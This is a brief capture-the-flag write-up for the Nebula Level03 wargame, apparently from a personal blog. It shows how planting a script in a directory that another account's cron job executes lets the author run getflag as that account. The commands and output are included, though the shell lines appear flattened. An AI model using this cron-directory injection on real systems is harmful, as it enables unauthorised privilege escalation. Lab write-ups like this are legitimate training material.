I was surprised how easy this level was. According to Exploit Exercises, Nebula Level03:
"Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes."
Checking out writable.sh, we see
$ cat ../writable.sh #!/bin/sh for i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done
This script executes everything within the directory writable.d, then deletes it.
Let's create a script for cron to execute for us inside the writeable.d directory.
$ echo -e '#!/bin/bash\n/bin/getflag > /tmp/output.txt' > file.sh $ chmod 700 file.sh
The output of the getflag command usually produces
$ getflag is executing on a non-flag account, this doesn't count
However, once cron executes our script, it creates a file output.txt with the output from the getflag command.
$ cat /tmp/output.txt You have successfully executed getflag on a target account
There we go!